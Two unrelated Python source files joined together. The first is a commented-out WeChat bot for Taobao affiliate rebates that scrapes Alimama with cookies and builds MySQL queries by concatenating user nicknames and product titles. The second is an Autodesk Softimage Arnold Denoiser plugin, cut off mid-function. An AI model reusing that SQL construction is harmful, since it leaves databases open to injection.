# 'accept-language': 'en-US,en;q=0.5',
# }
# res = self.get_url(url, headers)
# rj = res.json()
# if rj['data']['pageList'] != None:
# insert_sql = "INSERT INTO taojin_query_record(wx_bot, good_title, good_price, good_coupon, username, create_time, puid, bot_puid, skuid, type) VALUES('" + bot.self.nick_name + "', '" + rj['data']['pageList'][0]['title'] + "', '" + str(rj['data']['pageList'][0]['zkPrice']) + "', '"+ str(rj['data']['pageList'][0]['couponAmount']) +"', '" + raw.sender.nick_name + "', '" + str(time.time()) + "', '"+raw.sender.puid+"', '"+bot.self.puid+"', '"+ str(rj['data']['pageList'][0]['auctionId']) +"', '2')"
# cm.ExecNonQuery(insert_sql)
# cm.Close()
# return rj['data']['pageList'][0]
# else:
# return 'no match item'
# except Exception as e:
# trace = traceback.format_exc()
# self.logger.warning("error:{},trace:{}".format(str(e), trace))
#
# # 获取商品详情
# def get_group_detail(self, bot, q, raw):
# cm = ConnectMysql()
# chatrooms = bot.core.search_chatrooms(userName=raw.raw['FromUserName'])
# try:
# t = int(time.time() * 1000)
# tb_token = self.se.cookies.get('_tb_token_', domain="pub.alimama.com")
# pvid = '10_%s_1686_%s' % (self.myip, t)
# url = 'http://pub.alimama.com/items/search.json?q=%s&_t=%s&auctionTag=&perPageSize=40&shopTag=&t=%s&_tb_token_=%s&pvid=%s' % (
# urllib.quote(q.encode('utf8')), t, t, tb_token, pvid)
# headers = {
# 'method': 'GET',
# 'authority': 'pub.alimama.com',
# 'scheme': 'https',
# 'path': '/items/search.json?%s' % url.split('search.json?')[-1],
# 'accept': 'application/json, text/javascript, */*; q=0.01',
# 'x-requested-with': 'XMLHttpRequest',
# 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'referer': 'https://pub.alimama.com',
# 'accept-encoding': 'gzip, deflate, br',
# 'accept-language': 'en-US,en;q=0.5',
# }
# res = self.get_url(url, headers)
# rj = res.json()
# if rj['data']['pageList'] != None:
# insert_sql = "INSERT INTO taojin_query_record(wx_bot, good_title, good_price, good_coupon, username, create_time, puid, bot_puid, chatroom, skuid, type) VALUES('" + bot.self.nick_name + "', '" + rj['data']['pageList'][0]['title'] + "', '" + str(rj['data']['pageList'][0]['zkPrice']) + "', '"+ str(rj['data']['pageList'][0]['couponAmount']) +"', '" + raw.member.nick_name + "', '" + str(time.time()) + "', '"+ raw.member.puid +"', '"+ bot.self.puid +"', '"+ chatrooms['NickName'] +"', '"+ str(rj['data']['pageList'][0]['auctionId']) +"', '2')"
# cm.ExecNonQuery(insert_sql)
# cm.Close()
# return rj['data']['pageList'][0]
# else:
# return 'no match item'
# except Exception as e:
# trace = traceback.format_exc()
# self.logger.warning("error:{},trace:{}".format(str(e), trace))
#
# # 获取淘宝客链接
# def get_tk_link(self, auctionid):
# t = int(time.time() * 1000)
# tb_token = self.se.cookies.get('_tb_token_', domain="pub.alimama.com")
# pvid = '10_%s_1686_%s' % (self.myip, t)
# try:
# gcid, siteid, adzoneid = self.__get_tk_link_s1(auctionid, tb_token, pvid)
# self.__get_tk_link_s2(gcid, siteid, adzoneid, auctionid, tb_token, pvid)
# res = self.__get_tk_link_s3(auctionid, adzoneid, siteid, tb_token, pvid)
# return res
# except Exception as e:
# trace = traceback.format_exc()
# self.logger.warning("error:{},trace:{}".format(str(e), trace))
#
# # 第一步,获取推广位相关信息
# def __get_tk_link_s1(self, auctionid, tb_token, pvid):
# url = 'http://pub.alimama.com/common/adzone/newSelfAdzone2.json?tag=29&itemId=%s&blockId=&t=%s&_tb_token_=%s&pvid=%s' % (
# auctionid, int(time.time() * 1000), tb_token, pvid)
# headers = {
# 'Host': 'pub.alimama.com',
# 'Accept': 'application/json, text/javascript, */*; q=0.01',
# 'X-Requested-With': 'XMLHttpRequest',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'Referer': 'http://pub.alimama.com/promo/search/index.htm',
# 'Accept-Encoding': 'gzip, deflate, sdch',
# 'Accept-Language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res = self.get_url(url, headers)
# rj = res.json()
# gcid = rj['data']['otherList'][0]['gcid']
# siteid = rj['data']['otherList'][0]['siteid']
# adzoneid = rj['data']['otherAdzones'][0]['sub'][0]['id']
# return gcid, siteid, adzoneid
#
# # post数据
# def __get_tk_link_s2(self, gcid, siteid, adzoneid, auctionid, tb_token, pvid):
# url = 'http://pub.alimama.com/common/adzone/selfAdzoneCreate.json'
# data = {
# 'tag': '29',
# 'gcid': gcid,
# 'siteid': siteid,
# 'selectact': 'sel',
# 'adzoneid': adzoneid,
# 't': int(time.time() * 1000),
# '_tb_token_': tb_token,
# 'pvid': pvid,
# }
# headers = {
# 'Host': 'pub.alimama.com',
# 'Content-Length': str(len(json.dumps(data))),
# 'Accept': 'application/json, text/javascript, */*; q=0.01',
# 'Origin': 'http://pub.alimama.com',
# 'X-Requested-With': 'XMLHttpRequest',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
# 'Referer': 'http://pub.alimama.com/promo/search/index.htm',
# 'Accept-Encoding': 'gzip, deflate',
# 'Accept-Language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
#
# res = self.post_url(url, headers, data)
# return res
#
# # 获取口令
# def __get_tk_link_s3(self, auctionid, adzoneid, siteid, tb_token, pvid):
# url = 'http://pub.alimama.com/common/code/getAuctionCode.json?auctionid=%s&adzoneid=%s&siteid=%s&scenes=1&t=%s&_tb_token_=%s&pvid=%s' % (
# auctionid, adzoneid, siteid, int(time.time() * 1000), tb_token, pvid)
# headers = {
# 'Host': 'pub.alimama.com',
# 'Accept': 'application/json, text/javascript, */*; q=0.01',
# 'X-Requested-With': 'XMLHttpRequest',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'Referer': 'http://pub.alimama.com/promo/search/index.htm',
# 'Accept-Encoding': 'gzip, deflate, sdch',
# 'Accept-Language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res = self.get_url(url, headers)
# rj = json.loads(res.text)
# return rj['data']
#
# def get_real_url(self, url):
# try:
# headers = {
# 'Host': url.split('http://')[-1].split('/')[0],
# 'Upgrade-Insecure-Requests': '1',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
# 'Accept-Encoding': 'gzip, deflate, sdch',
# 'Accept-Language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res = self.get_url(url, headers)
# if re.search(r'itemId\":\d+', res.text):
# item_id = re.search(r'itemId\":\d+', res.text).group().replace('itemId":', '').replace('https://',
# 'http://')
# r_url = "https://detail.tmall.com/item.htm?id=%s" % item_id
# elif re.search(r"var url = '.*';", res.text):
# r_url = re.search(r"var url = '.*';", res.text).group().replace("var url = '", "").replace("';",
# "").replace(
# 'https://', 'http://')
# else:
# r_url = res.url
# if 's.click.taobao.com' in r_url:
# r_url = self.handle_click_type_url(r_url)
# else:
# while ('detail.tmall.com' not in r_url) and ('item.taobao.com' not in r_url) and (
# 'detail.m.tmall.com' not in r_url):
# headers1 = {
# 'Host': r_url.split('http://')[-1].split('/')[0],
# 'Upgrade-Insecure-Requests': '1',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
# 'Accept-Encoding': 'gzip, deflate, sdch',
# 'Accept-Language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res2 = self.get_url(r_url, headers1)
# self.logger.debug("{},{},{},{}".format(res2.url, res2.status_code, res2.history, res2.text))
# r_url = res2.url
#
# return r_url
# except Exception as e:
# self.logger.warning(str(e))
# return url
#
# def handle_click_type_url(self, url):
# # step 1
# headers = {
# 'method': 'GET',
# 'authority': 's.click.taobao.com',
# 'scheme': 'https',
# 'path': '/t?%s' % url.split('/t?')[-1],
# 'Upgrade-Insecure-Requests': '1',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
# 'Accept-Encoding': 'gzip, deflate, sdch',
# 'Accept-Language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res = self.get_url(url, headers)
# self.logger.debug("{},{},{}".format(res.url, res.status_code, res.history))
# url2 = res.url
#
# # step 2
# headers2 = {
# 'referer': url,
# 'method': 'GET',
# 'authority': 's.click.taobao.com',
# 'scheme': 'https',
# 'path': '/t?%s' % url2.split('/t?')[-1],
# 'Upgrade-Insecure-Requests': '1',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
# 'Accept-Encoding': 'gzip, deflate, sdch',
# 'Accept-Language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res2 = self.get_url(url2, headers2)
# self.logger.debug("{},{},{}".format(res2.url, res2.status_code, res2.history))
# url3 = urllib.unquote(res2.url.split('t_js?tu=')[-1])
#
# # step 3
# headers3 = {
# 'referer': url2,
# 'method': 'GET',
# 'authority': 's.click.taobao.com',
# 'scheme': 'https',
# 'path': '/t?%s' % url3.split('/t?')[-1],
# 'Upgrade-Insecure-Requests': '1',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0',
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
# 'Accept-Encoding': 'gzip, deflate, sdch',
# 'Accept-Language': 'zh,en-US;q=0.8,en;q=0.6,zh-CN;q=0.4,zh-TW;q=0.2',
# }
# res3 = self.get_url(url3, headers3)
# self.logger.debug("{},{},{}".format(res3.url, res3.status_code, res3.history))
# r_url = res3.url
#
# return r_url
#
# def get_order(self, bot, msg, orderId, userInfo, puid, raw):
#
# timestr = str(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
# order_id = int(orderId)
#
# cm = ConnectMysql()
#
# check_order_sql = "SELECT * FROM taojin_order WHERE order_id='" + str(order_id) + "' AND bot_puid = '" +bot.self.puid+ "';"
# check_order_res = cm.ExecQuery(check_order_sql)
#
# # 判断该订单是否已经提现
# if len(check_order_res) >= 1:
# cm.Close()
# sendtext ='''
# 一一一一 订单消息 一一一一
#
# 订单【%s】提交成功,请勿重复提交
# ''' % (msg['Text'])
# return sendtext
#
# cm.ExecNonQuery("INSERT INTO taojin_order(wx_bot, username, order_id, completion_time, order_source, puid, bot_puid, status) VALUES('"+ bot.self.nick_name +"', '"+str(userInfo['NickName'])+"', '"+str(order_id)+"', '" + str(timestr) + "', '1', '"+ puid +"', '"+ bot.self.puid +"', '1')")
#
# send_text ='''
# 一一一一 订单消息 一一一一
#
# 订单【%s】提交成功,请耐心等待订单结算
# 结算成功后机器人将自动返利到您个人账户
#
# ''' % (order_id)
# return send_text
#
# def changeInfo(self, bot, msg, info, order_id, userInfo, timestr, puid, raw):
# try:
# cm = ConnectMysql()
#
# # 查询用户是否有上线
# check_user_sql = "SELECT * FROM taojin_user_info WHERE puid='" + puid + "' AND bot_puid='"+ bot.self.puid +"';"
# check_user_res = cm.ExecQuery(check_user_sql)
#
# # 判断是否已经有个人账户,没有返回信息
# if len(check_user_res) < 1:
# cm.Close()
# return {"info":"not_info"}
# else:
#
# # 获取商品查询记录
# get_query_sql = "SELECT * FROM taojin_query_record WHERE good_title='" + info['auctionTitle'] + "'AND puid='" + puid + "' AND bot_puid='"+ bot.self.puid +"' ORDER BY create_time LIMIT 1;"
#
# get_query_info = cm.ExecQuery(get_query_sql)
#
# if get_query_info == ():
# user_text = '''
# 一一一一订单信息一一一一
#
# 返利失败,订单信息有误
#
# '''
# return {'info': 'not_order', 'user_text': user_text}
#
# # 定义SQL语句 查询用户是否已经存在邀请人
# # 判断是否已经有邀请人了
# if check_user_res and check_user_res[0][17] != '0':
#
# # 获取邀请人信息
# get_parent_sql = "SELECT * FROM taojin_user_info WHERE lnivt_code='" + str(check_user_res[0][17]) + "' AND bot_puid='"+ bot.self.puid +"';"
#
# get_parent_info = cm.ExecQuery(get_parent_sql)
#
# # 计算返佣
# add_balance = round(float(info['feeString']) * float(config.get('BN', 'bn3t')), 2)
# # 累加余额
# withdrawals_amount = round(float(check_user_res[0][9]) + add_balance, 2)
# # 累加淘宝总返利
# taobao_rebate_amount = round(float(check_user_res[0][8]) + add_balance, 2)
# # 累加总返利
# total_rebate_amount = round(float(check_user_res[0][6]) + add_balance, 2)
#
# jishen = (float(get_query_info[0][4]) - float(info['realPayFeeString']))
#
# if jishen < 0:
# jishen = 0
#
# # 计算共节省金额,商品原价减去实际支付价格,加上原有节省金额加上返佣
# save_money = round(check_user_res[0][10] + jishen + add_balance, 2)
# # 总订单数加一
# total_order_num = int(check_user_res[0][11]) + 1
# # 淘宝订单数加一
# taobao_order_num = int(check_user_res[0][13]) + 1
#
# # 邀请人返利金额
# add_parent_balance = round(float(info['feeString']) * float(config.get('BN', 'bn4')), 2)
#
# # 给邀请人好友返利加上金额
# friends_rebatr = float(get_parent_info[0][19]) + float(add_balance)
# # 邀请人总钱数加上返利金额
# withdrawals_amount2 = round(float(get_parent_info[0][9]) + float(add_balance) * float(config.get('BN', 'bn4')), 2)
#
# cm.ExecNonQuery("UPDATE taojin_user_info SET withdrawals_amount='" + str(withdrawals_amount) + "', save_money='"+ str(save_money) +"', taobao_rebate_amount='"+ str(taobao_rebate_amount) +"', total_rebate_amount='"+ str(total_rebate_amount) +"', order_quantity='"+str(total_order_num)+"', taobao_order_quantity='"+str(taobao_order_num)+"', update_time='"+str(time.time())+"' WHERE puid='" + puid + "' AND bot_puid='"+ bot.self.puid +"';")
# cm.ExecNonQuery("UPDATE taojin_user_info SET withdrawals_amount='" + str(withdrawals_amount2) + "', friends_rebate='"+str(friends_rebatr)+"', update_time='"+str(time.time())+"' WHERE lnivt_code='" + str(check_user_res[0][17]) + "' AND bot_puid='"+ bot.self.puid +"';")
#
# select_order_num = "SELECT * FROM taojin_order WHERE puid='"+puid+"' AND bot_puid='"+bot.self.puid+"'"
# # 订单已完成,修改备注
# order_num = cm.ExecQuery(select_order_num)
#
# if order_num == ():
# split_arr = raw.sender.remark_name.split('_')
# new_remark_name = '%s%s%s%s%s%s%s' % (split_arr[0], '_', split_arr[1], '_', 'C', '_', split_arr[3])
# bot.core.set_alias(userName=raw.sender.user_name, alias=new_remark_name)
#
# cm.ExecNonQuery("UPDATE taojin_user_info SET remarkname = '"+new_remark_name+"' WHERE puid='" + puid + "' AND bot_puid='" + bot.self.puid + "'")
#
# cm.ExecNonQuery("INSERT INTO taojin_order(wx_bot, username, order_id, completion_time, order_source, puid, bot_puid) VALUES('"+ bot.self.nick_name +"', '"+str(userInfo['NickName'])+"', '"+str(order_id)+"', '" + str(timestr) + "', '2', '"+ puid +"', '"+ bot.self.puid +"')")
#
# # 累计订单数量
# order_nums = cm.ExecQuery(select_order_num)
#
# split_arr2 = raw.sender.remark_name.split('_')
#
# new_remark_name2 = '%s%s%s%s%s%s%s' % (split_arr2[0], '_', split_arr2[1], '_', split_arr2[2], '_', len(order_nums))
#
# bot.core.set_alias(userName=raw.sender.user_name, alias=new_remark_name2)
#
# cm.ExecNonQuery("UPDATE taojin_user_info SET remarkname = '"+new_remark_name2+"' WHERE puid='" + puid + "' AND bot_puid='" + bot.self.puid + "'")
#
# args = {
# 'wx_bot': bot.self.nick_name,
# 'bot_puid': bot.self.puid,
# 'username': check_user_res[0][4],
# 'puid': puid,
# 'rebate_amount': add_balance,
# 'type': 3,
# 'create_time': time.time()
# }
#
#
# # 写入返利日志
# cm.InsertRebateLog(args)
# parent_puid = self.ort.getPuid(bot, get_parent_info[0][4])
# args2 = {
# 'wx_bot': bot.self.nick_name,
# 'bot_puid': bot.self.puid,
# 'username': get_parent_info[0][4],
# 'puid': parent_puid,
# 'rebate_amount': add_parent_balance,
# 'type': 4,
# 'create_time': time.time()
# }
#
#
# # 写入返利日志
# cm.InsertRebateLog(args2)
#
# parent_user_text = '''
# 一一一一 推广信息 一一一一
#
# 您的好友【%s】又完成了一笔订单
# 返利提成%s元已发放到您个人账户
# 回复【个人信息】可查询账户信息
# ''' % (check_user_res[0][4], add_parent_balance)
#
# user_text = '''
# 一一一一系统消息一一一一
#
# 订单【%s】已完成
# 返利金%s元已发放到您的个人账户
# 回复【个人信息】可查询账户信息
# 回复【提现】可申请账户余额提现
# ''' % (order_id, add_balance)
# cm.Close()
# return {'parent_user_text': parent_user_text, 'user_text': user_text, 'info': 'success', 'parent': get_parent_info[0][4]}
# else:
# add_balance = round(float(info['feeString']) * float(config.get('BN', 'bn3t')), 2)
# withdrawals_amount = round(float(check_user_res[0][9]) + add_balance, 2)
# taobao_rebate_amount = round(float(check_user_res[0][8]) + add_balance, 2)
# total_rebate_amount = round(float(check_user_res[0][6]) + add_balance, 2)
#
# jishen = (float(get_query_info[0][4]) - float(info['realPayFeeString']))
#
# if jishen < 0:
# jishen = 0
#
# save_money = round(check_user_res[0][10] + (float(get_query_info[0][4]) - float(info['realPayFeeString'])) + add_balance, 2)
# total_order_num = int(check_user_res[0][11]) + 1
# taobao_order_num = int(check_user_res[0][13]) + 1
#
# cm.ExecNonQuery("UPDATE taojin_user_info SET withdrawals_amount='" + str(
# withdrawals_amount) + "', save_money='" + str(save_money) + "', taobao_rebate_amount='" + str(
# taobao_rebate_amount) + "', total_rebate_amount='" + str(
# total_rebate_amount) + "', order_quantity='"+str(total_order_num)+"', taobao_order_quantity='"+str(taobao_order_num)+"', update_time='" + str(time.time()) + "' WHERE puid='" + puid + "' AND bot_puid='"+ bot.self.puid +"';")
#
#
# select_order_num = "SELECT * FROM taojin_order WHERE puid='"+puid+"' AND bot_puid='"+bot.self.puid+"'"
# # 订单已完成,修改备注
# order_num = cm.ExecQuery(select_order_num)
#
# if order_num == ():
# split_arr = raw.sender.remark_name.split('_')
# new_remark_name = '%s%s%s%s%s%s%s' % (split_arr[0], '_', split_arr[1], '_', 'C', '_', split_arr[3])
# self.logger.debug(new_remark_name)
# bot.core.set_alias(userName=raw.sender.user_name, alias=new_remark_name)
#
# cm.ExecNonQuery("UPDATE taojin_user_info SET remarkname = '"+new_remark_name+"' WHERE puid='" + puid + "' AND bot_puid='" + bot.self.puid + "'")
#
# cm.ExecNonQuery("INSERT INTO taojin_order(wx_bot, username, order_id, completion_time, order_source, puid, bot_puid) VALUES('"+ bot.self.nick_name+"', '"+str(userInfo['NickName'])+"', '"+str(order_id)+"', '" + str(timestr) + "', '2', '"+puid+"', '"+bot.self.puid+"')")
#
# # 累计订单数量
# order_nums = cm.ExecQuery(select_order_num)
#
# split_arr2 = raw.sender.remark_name.split('_')
#
# new_remark_name2 = '%s%s%s%s%s%s%s' % (split_arr2[0], '_', split_arr2[1], '_', split_arr2[2], '_', len(order_nums))
#
# bot.core.set_alias(userName=raw.sender.user_name, alias=new_remark_name2)
#
# cm.ExecNonQuery("UPDATE taojin_user_info SET remarkname = '"+new_remark_name2+"' WHERE puid='" + puid + "' AND bot_puid='" + bot.self.puid + "'")
#
# args = {
# 'wx_bot': bot.self.nick_name,
# 'bot_puid': bot.self.puid,
# 'username': check_user_res[0][4],
# 'puid': puid,
# 'rebate_amount': add_balance,
# 'type': 3,
# 'create_time': time.time()
# }
#
#
# # 写入返利日志
# cm.InsertRebateLog(args)
#
# user_text = '''
# 一一一一系统消息一一一一
#
# 订单【%s】已完成
# 返利金%s元已发放到您的个人账户
# 回复【个人信息】可查询账户信息
# 回复【提现】可申请账户余额提现
# ''' % (order_id, add_balance)
# cm.Close()
# return {'user_text': user_text, 'info': 'not_parent_and_success'}
# except Exception as e:
# trace = traceback.format_exc()
# self.logger.warning("error:{},trace:{}".format(str(e), trace))
# return {'info': 'feild'}
#
# # 定时获取淘宝订单信息
# def getOrderInfo(self, bot):
# self.load_cookies()
#
# endTime = time.strftime('%Y-%m-%d', time.localtime(time.time()))
#
# startTime = str((datetime.date.today() - datetime.timedelta(days=1)))
#
# t = str(round(time.time()))
#
# url = "http://pub.alimama.com/report/getTbkPaymentDetails.json?startTime="+startTime+"&endTime="+endTime+"&payStatus=3&queryType=1&toPage=1&perPageSize=50&total=&t="+t+"&pvid=&_tb_token_=f8b388e3f3e37&_input_charset=utf-8"
#
# headers = {
# "Accept": "application/json, text/javascript, */*; q=0.01",
# "Accept-Encoding": "gzip, deflate",
# "Accept-Language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7",
# "Cache-Control": "no-cache",
# "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
# "Host": "pub.alimama.com",
# "Pragma": "no-cache",
# "Referer": "http://pub.alimama.com/myunion.htm?spm=a219t.7900221/1.a214tr8.2.3d7c75a560ieiE",
# "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0",
# "X-Requested-With": "XMLHttpRequest"
# }
#
# while True:
# # 间隔3个小时
# time.sleep(10)
# try:
# # 请求订单接口
# res = self.get_url(url, headers)
# # 格式转化一下
# res_dict = json.loads(res.text)
# except Exception as e:
# self.logger.debug(e)
# return e
#
# if __name__ == '__main__':
# al = Alimama()
# # al.login()
# # q = u'现货 RS版 树莓派3代B型 Raspberry Pi 3B 板载wifi和蓝牙'
# # q = u'蔻斯汀玫瑰身体护理套装沐浴露身体乳爽肤水滋润全身保湿补水正品'
# # q = u'DIY个性定制T恤 定做工作服短袖 男女夏季纯棉广告文化衫Polo印制'
# q = u'防晒衣女2017女装夏装新款印花沙滩防晒服薄中长款大码白色短外套'
# # res = al.get_detail(q)
# # auctionid = res['auctionId']
# # al.get_tk_link(auctionid)
# # url = 'http://c.b1wt.com/h.SQwr1X?cv=kzU8ZvbiEa8&sm=796feb'
# # al.get_real_url(url)
# # url = 'http://c.b1wt.com/h.S9fQZb?cv=zcNtZvbH4ak&sm=79e4be'
# # al.get_real_url(url)
# # url = 'http://c.b1wt.com/h.S9gdyy?cv=RW5EZvbuYBw&sm=231894'
# # al.get_real_url(url)
# # url = 'http://c.b1wt.com/h.S8ppn7?cv=ObUrZvZ3oH9&sm=1b02f8'
# # al.get_real_url(url)
# # url = 'http://c.b1wt.com/h.SQ70kv?cv=L5HpZv0w4hJ'
# # url = 'http://c.b1wt.com/h.S9A0pK?cv=8grnZvYkU14&sm=efb5b7'
# url = 'http://zmnxbc.com/s/nlO3j?tm=95b078'
# al.get_real_url(url)
|
ArnoldDenoiser.py
|
"""************************************************************************************************************************************
Copyright 2017 Autodesk, Inc. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.
************************************************************************************************************************************"""
# Arnold Denoiser
# Initial code generated by Softimage SDK Wizard
# Executed Tue Dec 11 19:48:36 UTC+0100 2018 by Jens Lindgren
import win32com.client
from win32com.client import constants as C
import glob
import os
import re
import subprocess
import sys
import threading
from time import sleep
null = None
false = 0
true = 1
# startupinfo to prevent Windows processes to display a console window
if sys.platform == 'win32':
_no_window = subprocess.STARTUPINFO()
_no_window.dwFlags |= subprocess.STARTF_USESHOWWINDOW
else:
_no_window = None
def XSILoadPlugin( in_reg ):
if Application.plugins('Arnold Tools') is None:
Application.LoadPlugin(XSIUtils.BuildPath(in_reg.OriginPath, 'ArnoldTools.js'))
h = Application.SItoAToolHelper()
h.SetPluginInfo(in_reg, 'Arnold Denoiser')
in_reg.RegisterCommand('OpenDenoiserProperty', 'SITOA_OpenDenoiserProperty')
in_reg.RegisterProperty('arnold_denoiser')
#RegistrationInsertionPoint - do not remove this line
return true
def XSIUnloadPlugin( in_reg ):
return true
def OpenDenoiserProperty_Init( in_ctxt ):
oCmd = in_ctxt.Source
oArgs = oCmd.Arguments
oArgs.Add("in_pass")
oArgs.Add("in_inspect")
return true
def OpenDenoiserProperty_Execute(in_pass, in_inspect):
inspect = True if in_inspect is None else in_inspect
# default to currentpass
obj = Application.ActiveProject.ActiveScene.ActivePass
if in_pass:
if not in_pass.IsEqualTo(Application.ActiveProject.ActiveScene.PassContainer):
# if Arnold Render Options is Local in the Pass where the button was pressed, use that instead of currentpass
obj = in_pass
propCollection = obj.Properties
prop = propCollection.Find('arnold_denoiser')
if not prop:
prop = obj.AddProperty("arnold_denoiser", false, "Arnold Denoiser")
if inspect:
Application.InspectObj(prop)
return prop
def arnold_denoiser_Define( in_ctxt ):
cp = in_ctxt.Source
cp.AddParameter2('input', C.siString, '', None, None, None, None, C.siClassifUnknown, C.siPersistable)
cp.AddParameter2('output_suffix', C.siString, '_denoised', None, None, None, None, C.siClassifUnknown, C.siPersistable)
cp.AddParameter2('output', C.siString, '', None, None, None, None, C.siClassifUnknown, C.siReadOnly)
cp.AddParameter2('frame_range', C.siString, 'Complete Sequence', None, None, None, None, C.siClassifUnknown, C.siPersistable)
cp.AddParameter2('start_frame', C.siInt4, 0, 0, 2147483647, 0, 100, C.siClassifUnknown, C.siPersistable)
cp.AddParameter2('end_frame', C.siInt4, 0, 0, 2147483647, 0, 100, C.siClassifUnknown, C.siPersistable)
cp.AddParameter2('temporal_frames', C.siInt4, 0, 0, 2, 0, 2, C.siClassifUnknown, C.siPersistable)
cp.AddParameter2('variance', C.siFloat, 0.5, 0, 1, 0, 1, C.siClassifUnknown, C.siPersistable)
cp.AddParameter2('pixel_search_radius', C.siInt4, 9, 6, 21, 6, 21, C.siClassifUnknown, C.siPersistable)
cp.AddParameter2('pixel_patch_radius', C.siInt4, 3, 0, 6, 0, 6, C.siClassifUnknown, C.siPersistable)
cp.AddParameter2('light_group_aovs', C.siString, '', None, None, None, None, C.siClassifUnknown, C.siPersistable)
return true
# Tip: Use the "Refresh" option on the Property Page context menu to
# reload your script changes and re-execute the DefineLayout callback.
def arnold_denoiser_DefineLayout( in_ctxt ):
layout = in_ctxt.Source
layout.Clear()
file_types = 'OpenEXR files (*.exr)|*.exr||'
item = layout.AddItem('input', 'Input', C.siControlFilePath)
item.SetAttribute(C.siUIFileFilter, file_types)
item.SetAttribute(C.siUIOpenFile, True)
item.SetAttribute(C.siUIFileMustExist, True)
item.SetAttribute(C.siUILabelMinPixels, 40)
item.SetAttribute(C.siUILabelPercentage, 20)
item = layout.AddItem('output_suffix', 'Output Suffix')
item.SetAttribute(C.siUILabelMinPixels, 80)
item = layout.AddItem('output', 'Output')
item.SetAttribute(C.siUILabelMinPixels, 40)
item.SetAttribute(C.siUILabelPercentage, 20)
frame_ranges = [
'Single Frame', 'Single Frame',
'Start / End', 'Start / End',
'Complete Sequence', 'Complete Sequence'
]
item = layout.AddEnumControl('frame_range', frame_ranges, 'Frame Range')
item.SetAttribute(C.siUILabelMinPixels, 80)
layout.AddRow()
layout.AddItem('start_frame', 'Start Frame')
layout.AddItem('end_frame', 'End Frame')
layout.EndRow()
item = layout.AddItem('temporal_frames', 'Temporal Stability Frames')
item.SetAttribute(C.siUILabelMinPixels, 140)
item = layout.AddItem('variance', 'Variance')
item.SetAttribute(C.siUILabelMinPixels, 140)
item = layout.AddItem('pixel_search_radius', 'Pixel Search Radius')
item.SetAttribute(C.siUILabelMinPixels, 140)
item = layout.AddItem('pixel_patch_radius', 'Pixel Patch Radius')
item.SetAttribute(C.siUILabelMinPixels, 140)
item = layout.AddItem('light_group_aovs', 'Light Group AOVs')
item.SetAttribute(C.siUILabelMinPixels, 100)
item = layout.AddButton('denoise', 'Denoise')
item.SetAttribute(C.siUICX, 80)
item.SetAttribute(C.siUICY, 30)
return true
def arnold_denoiser_OnInit( ):
Application.LogMessage('arnold_denoiser_OnInit called', C.siVerbose)
input_logic()
frame_range_logic()
def arnold_denoiser_OnClosed( ):
Application.LogMessage('arnold_denoiser_OnClosed called', C.siVerbose)
def arnold_denoiser_input_OnChanged( ):
Application.LogMessage('arnold_denoiser_input_OnChanged called', C.siVerbose)
oParam = PPG.input
paramVal = oParam.Value
Application.LogMessage(str('New value: ') + str(paramVal), C.siVerbose)
input_logic()
def arnold_denoiser_output_suffix_OnChanged( ):
Application.LogMessage('arnold_denoiser__output_suffix_OnChanged called', C.siVerbose)
oParam = PPG.output_suffix
paramVal = oParam.Value
Application.LogMessage(str('New value: ') + str(paramVal), C.siVerbose)
input_logic()
def arnold_denoiser_frame_range_OnChanged( ):
Application.LogMessage('arnold_denoiser_frame_range_OnChanged called', C.siVerbose)
oParam = PPG.frame_range
paramVal = oParam.Value
Application.LogMessage(str('New value: ') + str(paramVal), C.siVerbose)
frame_range_logic()
def arnold_denoiser_denoise_OnClicked( ):
